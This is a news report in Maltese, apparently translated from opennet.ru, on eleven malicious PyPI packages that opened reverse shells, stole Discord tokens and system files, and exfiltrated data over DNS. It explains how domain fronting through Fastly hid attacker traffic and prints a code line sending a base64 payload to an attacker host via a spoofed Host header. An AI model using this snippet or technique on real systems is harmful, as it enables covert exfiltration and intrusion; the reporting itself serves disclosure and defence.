Il-katalgu PyPI (Python Package Index) żvela 11-il pakkett li kien jinkludi kodiċi malizzjuż. Qabel ma ġew identifikati l-problemi, il-pakketti rnexxielhom iniżżlu madwar 38 elf darba b'kollox. Il-pakketti malizzjużi misjuba huma notevoli għall-użu ta 'modi kkomplikati biex jaħbu l-kanali ta' komunikazzjoni mas-servers tal-attakkanti.
- importantpackage (6305 downloads), important-package (12897) - stabbilixxa konnessjoni ma 'server estern taħt l-iskuża ta' konnessjoni ma 'pypi.python.org biex jipprovdi aċċess shell għas-sistema (shell reverse) u uża l-programm trevorc2 biex jaħbi l- kanal ta' komunikazzjoni.
- pptest (10001), ipboards (946) - użat DNS bħala kanal ta 'komunikazzjoni biex tittrasferixxi informazzjoni dwar is-sistema (fl-ewwel pakkett, l-isem tal-host, id-direttorju tax-xogħol, l-IP intern u estern, fit-tieni - username u hostname).
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) skoprew it-token tas-servizz Discord fis-sistema u bagħtu lil host estern.
- trrfab (287) - jibgħat l-identifikatur, l-isem tal-host u l-kontenut ta' /etc/passwd, /etc/hosts, /home lil host estern.
- 10Cent10 (490) - stabbilixxa konnessjoni reverse shell ma 'host estern.
- yandex-yt (4183) - wera messaġġ dwar is-sistema li qed tiġi kompromessa u ridirezzjonata lejn paġna b'informazzjoni addizzjonali dwar aktar azzjonijiet maħruġa permezz ta' nda.ya.ru (api.ya.cc).
Ta 'nota partikolari huwa l-metodu ta' aċċess għal hosts esterni użati fil-pakketti importanti u pakketti importanti, li użaw in-netwerk ta 'kunsinna ta' kontenut Fastly użat fil-katalgu PyPI biex jaħbu l-attività tagħhom. Fil-fatt, it-talbiet intbagħtu lis-server pypi.python.org (inkluż l-ispeċifikazzjoni tal-isem python.org fl-SNI ġewwa t-talba HTTPS), iżda fl-istess ħin, l-isem tas-server ikkontrollat mill-attakkanti ġie stabbilit fl-HTTP header "Ospitanti" (sec.forward.io. global.prod.fastly.net). In-netwerk tal-kunsinna tal-kontenut bagħat talba simili lis-server tal-attakkant billi juża l-parametri tal-konnessjoni TLS ma 'pypi.python.org meta jittrażmetti d-dejta.
L-infrastruttura PyPI hija mħaddma min-netwerk ta 'konsenja tal-kontenut Fastly, li juża proxy Verniċ trasparenti biex jaħżen it-talbiet tipiċi fil-cache, u juża l-ipproċessar taċ-ċertifikat TLS fil-livell CDN, aktar milli servers finali, biex jorganizza t-trażmissjoni ta' talbiet HTTPS permezz ta 'prokura. Irrispettivament mill-host fil-mira, it-talbiet jintbagħtu lill-proxy, li jiddetermina l-host mixtieq mill-header HTTP "Host", u l-ismijiet tad-dominju tal-hosts huma marbuta mal-indirizzi IP tipiċi ta 'balancers tat-tagħbija CDN għall-klijenti Fastly kollha.
Is-server tal-attakkant jirreġistra wkoll ma’ CDN Fastly, li jipprovdi pjanijiet ta’ data b’xejn lil kulħadd u anke jippermetti reġistrazzjoni anonima. Ta 'min jinnota li meta tinħoloq "qoxra inversa", tintuża wkoll skema biex tibgħat talbiet lill-vittma, iżda mibdija mill-ospitant tal-attakkanti. Minn barra, l-interazzjoni mas-server tal-attakkant tidher qisha sessjoni leġittima mad-direttorju PyPI, encrypted bl-użu taċ-ċertifikat PyPI TLS. Teknika simili, magħrufa bħala "domain fronting", kienet preċedentement użata b'mod attiv biex taħbi l-isem tal-host meta jinqabżu serraturi, bl-użu tal-kapaċità pprovduta f'xi netwerks CDN biex jaċċessaw HTTPS b'host fittizju speċifikat fl-SNI u t-trażmissjoni attwali tal-isem ta' l-host mitluba fil-header HTTP Ospitanti fi ħdan sessjoni TLS.
Biex taħbi l-attività malizzjuża, intuża wkoll il-pakkett TrevorC2, li għamel l-interazzjoni mas-server simili għan-navigazzjoni web normali, pereżempju, intbagħtu talbiet malizzjużi taħt l-iskuża ta 'tniżżil ta' immaġni "https://pypi.python.org/images /guid=" b'informazzjoni ta 'kodifikazzjoni fil-parametru guid. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request (url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Il-pakketti pptest u ipboards użaw approċċ differenti biex jaħbu l-attività tan-netwerk ibbażat fuq il-kodifikazzjoni tal-informazzjoni tat-tagħbija f'mistoqsijiet lis-server DNS. Softwer malizzjuż jittrażmetti informazzjoni billi jwettaq talbiet DNS tal-forma "nu4timjagq4fimbuhe.example.com", li fiha d-dejta trażmessa lis-server tal-kmand u l-kontroll hija kkodifikata fl-isem tas-subdominju bl-użu tal-format base64. L-attakkant jirċievi dawn il-messaġġi billi jikkontrolla s-server DNS għad-dominju example.com.
Sors: opennet.ru